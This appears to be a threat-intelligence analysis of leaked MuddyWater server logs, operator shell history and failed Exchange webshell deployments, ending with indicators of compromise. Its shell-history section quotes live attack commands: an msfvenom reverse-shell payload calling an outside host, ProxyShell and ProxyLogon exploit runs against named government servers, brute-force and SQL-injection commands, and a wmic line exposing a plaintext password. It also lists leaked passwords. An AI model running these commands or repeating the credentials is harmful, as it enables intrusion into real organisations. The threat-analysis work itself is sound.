Skip to main content

Overview

This page analyzes server logs and operational history recovered from MuddyWater infrastructure, including the AMEEN ALKHALIJ WordPress server logs, operator shell history, and failed operation logs.

AMEEN ALKHALIJ Server Logs

Server Information

Log File: ameen-alkhalij.nu.log
Domain: ameen-alkhalij.nu
Server Type: WordPress hosting (likely compromised infrastructure)
Log Period: January 8-9, 2025
Total Entries: 250+ entries (truncated at line 250)

Attack Pattern Analysis

WordPress Exploitation Attempts

The server logs show extensive automated scanning and exploitation attempts against WordPress installations: Setup Config Scanning (Primary Pattern): 
GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404
GET /wp-admin/setup-config.php HTTP/1.1" 409
Timeline of setup-config.php Attempts:
  • Jan 8, 18:06 - 23:48: 38 attempts from various Cloudflare IPs
  • Jan 9, 00:09 - 11:56: Continued attempts every 15-20 minutes
  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Response Codes:
  • 404: WordPress not installed at that path
  • 409: Setup already configured (WordPress exists)

XML-RPC Exploitation

Between 04:39-04:43 on January 9, a concentrated XML-RPC attack occurred: Attack Details: 
Source IP: 152.42.193.218
Timestamp: 09/Jan/2025:04:39:00 - 04:43:58
Requests: 100+ POST requests to /xmlrpc.php
Interval: Every 3-4 seconds
Response: 200 415 (Method not allowed)
Attack Sequence:
  1. HEAD /xmlrpc.php - Check if XML-RPC is enabled
  2. GET /wp-json/wp/v2/users - Enumerate WordPress users
  3. 100+ POST /xmlrpc.php attempts - Brute force authentication
Related File Probing: 
HEAD /wp/xmlrpc.php HTTP/1.1" 404
HEAD /wordpress/xmlrpc.php HTTP/1.1" 404
HEAD /old/xmlrpc.php HTTP/1.1" 404
HEAD /new/xmlrpc.php HTTP/1.1" 404
HEAD /blog/xmlrpc.php HTTP/1.1" 404

Login Page Scanning

Multiple attempts to locate WordPress login pages: Pattern: 
152.42.193.218 - "GET /wp-login.php HTTP/1.1" 404
188.166.250.145 - "GET /wp-login.php HTTP/1.1" 404
128.199.157.221 - "GET /wp-login.php HTTP/1.1" 404

Reconnaissance Activities

Bot Traffic Analysis

Applebot Crawler: 
17.241.75.192 - "GET /robots.txt HTTP/1.1" 404
17.241.75.192 - "GET / HTTP/1.1" 444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1)
Serpstatbot SEO Crawler: 
195.201.12.243 - "GET /robots.txt HTTP/1.1" 404
195.201.12.243 - "GET / HTTP/1.1" 444
User-Agent: serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/)

Security Scanning

Hosting Scan (likely security researcher): 
62.210.90.209 - "HEAD / HTTP/1.1" 444 - curl/7.81.0
62.210.90.209 - "GET / HTTP/1.1" 444
62.210.90.209 - "GET /favicon.ico HTTP/1.1" 404
62.210.90.209 - "GET /ads.txt HTTP/1.1" 404
62.210.90.209 - "GET /app-ads.txt HTTP/1.1" 404
62.210.90.209 - "GET /sellers.json HTTP/1.1" 404
CMS Detection Attempts: 
165.227.163.36 - "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 - python-requests/2.18.4
165.227.163.36 - "GET /administrator/index.php HTTP/1.1" 404 - python-requests/2.18.4
165.227.163.36 - "GET /misc/ajax.js HTTP/1.1" 404 - python-requests/2.18.4

Source IP Analysis

Top Attacking IPs:
IP AddressOrganizationRequest CountActivity Type
152.42.193.218Unknown100+XML-RPC brute force
172.69.x.x, 172.71.x.xCloudflare50+Setup-config scanning
162.158.x.xCloudflare30+Setup-config scanning
141.101.x.xCloudflare20+Setup-config scanning
188.166.250.145DigitalOcean3wp-login scanning
Geographic Distribution:
  • Primary traffic: Cloudflare CDN (multiple /16 blocks)
  • Secondary: Direct IP attacks from hosting providers
  • Reconnaissance: Search engine bots and security scanners

Server Response Patterns

HTTP Response Code Distribution:
  • 404: File/path not found (majority of responses)
  • 409: WordPress already configured
  • 444: Nginx reject (blocked requests)
  • 405: Method not allowed (XML-RPC)
  • 200 415: XML-RPC endpoint exists but rejects method

ZSH History Analysis

Operator Profile

Shell File: zsh_history.txt
Hostname: Unknown (referred to as “luki” in paths)
Operating System: Linux (likely Kali Linux or Parrot OS)
Command Count: 1,369 commands (truncated) Activity Period: Extended reconnaissance and exploitation campaign

Toolset and Capabilities

Reconnaissance Tools

Subdomain Enumeration: 
subfinder -d dubaipolice.ae
subfinder -d iaa.gov.il -o iaasubs.txt
subfinder -d epc.ae
subfinder -d moi.gov.af
subfinder -d jazz.com.pk
Network Scanning: 
nmap -Pn 94.56.228.229
nmap -vvv -Pn --open -p 3389,445,139,21,22,1433,3306 193.188.64.0/24
nbtscan -r 91.151.128.0/24
DNS Reconnaissance: 
dig +short dubaipolice.ae
host 94.56.228.68
whois epc.ae
dnsenum mcit.gov.af
Web Scanning: 
ffuf -w fuzz.txt -u https://www.epc.ae/FUZZ
whatweb 94.56.113.142
wpscan --url https://www.emaratech.ae --enumerate p

Exploitation Tools

ProxyShell Exploitation: 
git clone https://github.com/Udyz/proxyshell-auto.git
python3 proxyshell.py -t 123.243.161.131
python3 proxyshell.py -t mail.unitech.com.az
python3 exchange_proxyshell.py -u 5.195.4.53 -e [email protected]
Metasploit Framework: 
sudo msfconsole
use scanner/smb/smb_version
msfvenom -p java/jsp_shell_reverse_tcp LHOST=88.80.145.107 LPORT=4444 -f raw >a.jsp
SMB/RDP Attacks: 
enum4linux -a 185.203.230.44
smbclient -L \\\\5.195.73.65\\
ncrack -u administrator -P aePassword.txt ftp://94.56.88.66
medusa -h 5.195.73.65 -u Administrator -P /home/luki/10k.txt -M smbnt
SQL Injection: 
sqlmap -r /home/luki/sql-target/lametayel.co.il.txt -p node_map_id --technique=B --dbms=mysql
sqlmap -u carsforum.co.il/cars/CfAutocomplete/HitSearch?sentence=1 -p sentence

Target Countries and Organizations

The shell history reveals systematic targeting of multiple countries:

United Arab Emirates (UAE)

subfinder -d dubaipolice.ae
subfinder -d daa.gov.ae
subfinder -d emaratech.ae
subfinder -d du.ae
nmap -Pn 94.56.228.68  # Dubai IP range
nmap -Pn 213.42.84.0/24  # UAE range
UAE Specific Commands:
  • Dubai Police Lab: subfinder -d dubaipolicelab.ae
  • Emirates Identity Authority: nmap -Pn emaratech.ae
  • Dubai Chamber: subfinder -d dubaichamber.com
  • RTA Dubai: ffuf -u https://login.rta.ae/FUZZ

Afghanistan

subfinder -d mof.gov.af  # Ministry of Finance
subfinder -d mod.gov.af  # Ministry of Defense  
subfinder -d aop.gov.af  # Attorney General's Office
subfinder -d moi.gov.af  # Ministry of Interior
subfinder -d mfa.gov.af  # Ministry of Foreign Affairs
nmap -Pn mail.roshan.af  # Roshan Telecom

Pakistan

subfinder -d jazz.com.pk
nmap -sV -sC pakirsa.gov.pk
subfinder -d dgip.gov.pk
nmap -Pn 202.83.172.0/24

Israel

subfinder -d iaa.gov.il  # Israel Airports Authority
cat iaasubs.txt | dnsx -silent
sqlmap targets: lametayel.co.il, carsforum.co.il

Saudi Arabia

ffuf -u http://fun.sa.zain.com/FUZZ
nmap -Pn reports.aas.com.sa
ffuf -u https://email.aljaziracapital.com.sa/owa/auth/FUZZ

Lebanon

subfinder -d alfamobile.com.lb
nmap -Pn mail.general-security.gov.lb
ffuf -u https://pcm.gov.lb/FUZZ  # Prime Minister's Office

Jordan

subfinder -d gov.jo
subfinder -d gfmis.gov.jo  # Government Financial Management System

Turkey

subfinder -d turktelekom.com.tr
amass enum -src -brute -recursive 2 -d turktelekom.com.tr

Kuwait

cat kw-targets.txt  # Various Kuwaiti targets

Georgia

nmap -Pn ftp.geocell.ge
whois silk.ge
cat ex-rda.txt  # Exchange servers: exchange-01.moa.gov.ge

Armenia

subfinder -d mfa.am  # Ministry of Foreign Affairs
nmap -Pn mail.e-citizen.am

Credential Management

Password Lists Used: 
cat joker-pass.txt
cat total-ae-pass.txt  # UAE-specific passwords
cat plistpub.txt
grep 'Gh@dyismyfirsts0n' joker-pass.txt
grep 'P@' joker-pass.txt
User Lists: 
cat user.txt
echo administrator >>user.txt
echo sa >>sqluser.txt  # SQL Server accounts
echo Administrator >user.txt
echo admin >>user.txt
Specific Credentials Searched:
  • Gh@dyismyfirsts0n
  • N!cecare
  • mobily@123
  • Xdxbsystem6337X
Target Accounts Identified:
  • Saudi Arabia: t.alzahrani.dar, svc-win48, bmcpatrol
  • Lebanon: SCANSAIDA, ELIEGE, jacqueshad, bechirbad

Network Infrastructure

C2 and Proxy Infrastructure: 
ssh -N -L 192.168.10.107:443:127.0.0.2:443 -p 443 [email protected]
ssh -N -L 192.168.10.107:8080:127.0.0.2:8080 -p 443 [email protected]
Compromised Infrastructure:
  • 88.80.145.122 - SSH tunnel/proxy
  • 103.57.251.31:3512 - SOCKS5 proxy
Port Forwarding: 
nc -lvnp 5555  # Reverse shell listener
nc -lvnp 49455
nc -lvnp 4444

Post-Exploitation Activities

Lateral Movement: 
rpcclient -U "" -N 5.195.73.65
smbclient //5.195.73.65/IPC$ -N
smbclient //5.195.73.65/C$ -N
smbmap -H 5.195.73.65
Data Exfiltration: 
smbclient -L \\\\213.42.128.30
type \\\\10.20.105.21\\C$\\windows\\temp\\Crashpad\\log.txt
dir \\\\10.20.106.60\\C$\\users
Credential Dumping: 
samdump2 SAM SYSTEM
wmic /NODE:"10.20.101.17" /USER:"Admin1@MFA" /PASSWORD:"KazimAtes1977+-*/!!KazimAtes1977+-*/!!" Process Call Create "cmd.exe /c ..."

Vulnerability Exploitation

ProxyShell (CVE-2021-34473, CVE-2021-34523): 
python3 proxyshell.py -t 41.138.49.2
python3 exchange_proxyshell.py -u https://41.138.49.2
python3 proxyshell.py -t https://88.80.145.107
ProxyLogon: 
git clone https://github.com/praetorian-inc/proxylogon-exploit.git
python exploit.py --frontend https://mail.moe.gov.ae --email Aimie.Hamer --webshell shell.aspx
CVE-2024-21762: 
git clone https://github.com/BishopFox/cve-2024-21762-check.git
SMB Vulnerabilities: 
nmap -p445 --script smb-vuln-ms17-010 89.237.189.59
nmap --script smb-vuln* -p139,445 -T4 -Pn 89.237.190.197

Shell Failure Log Analysis

Failed Deployment Tracking

Log File: ea3e059ca58eec16a98691bcae372170d83b97c0_Shell failed.txt Total Failed Attempts: 49 documented failures across multiple countries

Failure Distribution by Country

Austria (At): 
185.50.235.189    https://185.50.235.189/owa/auth/msfuj.aspx
80.109.157.74     https://80.109.157.74/owa/auth/webclient.aspx
80.120.41.94      https://80.120.41.94/aspnet_client/wsrnt.aspx
80.121.245.134    https://80.121.245.134/aspnet_client/dggle.aspx
81.223.143.210    https://81.223.143.210/aspnet_client/maggb.aspx
Germany (De): 
37.24.200.74      https://37.24.200.74/aspnet_client/system_web/webclient.aspx
185.40.175.36     https://185.40.175.36/aspnet_client/spryc.aspx
213.252.16.62     https://213.252.16.62/owa/auth/Current/scripts/premium/abaak.aspx
156.67.54.90      https://156.67.54.90/owa/auth/OutlookOU.aspx
87.191.224.147    https://87.191.224.147/aspnet_client/pmkqm.aspx
Analysis: Failed attempts show ProxyShell exploitation against Exchange servers, with webshells unable to establish connection despite successful upload.

Webshell Naming Convention

Failed deployments reveal webshell naming patterns: Random 5-character names:
  • msfuj.aspx, wsrnt.aspx, dggle.aspx, maggb.aspx, hoqea.aspx
  • loolm.aspx, vpsem.aspx, spryc.aspx, pmkqm.aspx, abaak.aspx
System-themed names:
  • webclient.aspx (appears 5 times)
  • OutlookOU.aspx (appears 4 times)
  • errorFE.aspx
  • system_web/webclient.aspx
Randomized long names:
  • Vw8q1tdLy.aspx, fUMBz0mwHC.aspx, BTiuzWgu.aspx
  • g1t4YBfJJ.aspx, 0vPiLDQcfJDR.aspx, dYeuy3CETD.aspx

Deployment Paths

Webshells were uploaded to two primary locations:
  1. /owa/auth/ (OWA frontend)
  2. /aspnet_client/ (ASP.NET client scripts directory)
  3. /aspnet_client/system_web/ (nested system directory)

Operational Timeline

Phase 1: Reconnaissance (Continuous)

  • Subdomain enumeration of government domains
  • Port scanning of /24 and /16 network ranges
  • Service version detection
  • Vulnerability scanning

Phase 2: Initial Access (2022-2025)

  • ProxyShell exploitation campaigns
  • Webshell deployment
  • Initial credential harvesting

Phase 3: Persistence (Ongoing)

  • BellaCiao backdoor deployment
  • Service-based persistence mechanisms
  • Establishment of SSH tunnels

Phase 4: Lateral Movement (Active)

  • WMI-based remote execution
  • SMB network share enumeration
  • Credential reuse across networks

Phase 5: Collection (Current)

  • Log file exfiltration
  • Credential dumping
  • Network mapping

Key Findings

  1. Infrastructure Abuse: Compromised WordPress server used for C2 or staging
  2. Automation: Extensive use of automated scanning and exploitation tools
  3. Persistence: Multiple backup C2 domains (twittsupport.com, msn-center.uk)
  4. Operational Security: Use of SSH tunnels and SOCKS proxies for anonymity
  5. Target Profile: Government entities and critical infrastructure in Middle East
  6. Credential Reuse: Harvested credentials used across multiple organizations
  7. Failed Operations: 49 documented failed webshell deployments indicating detection or defensive measures

Indicators of Compromise

Domains

  • twittsupport.com (BellaCiao C2)
  • msn-center.uk (BellaCiao C2 backup)
  • ameen-alkhalij.nu (Compromised infrastructure)

File Paths

  • C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe
  • C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.exe
  • C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.ps1
  • /owa/auth/*.aspx
  • /aspnet_client/*.aspx

Service Names

  • “Java Update Services”
  • “Microsoft Exchange Services Log”

Network Indicators

  • Port 8000 (BellaCiao webserver)
  • Port 9090 (local forwarding)
  • Port 49450 (RDP forwarding)
  • SSH on port 443 (tunnel establishment)

Build docs developers (and LLMs) love

Get started for freeTalk to us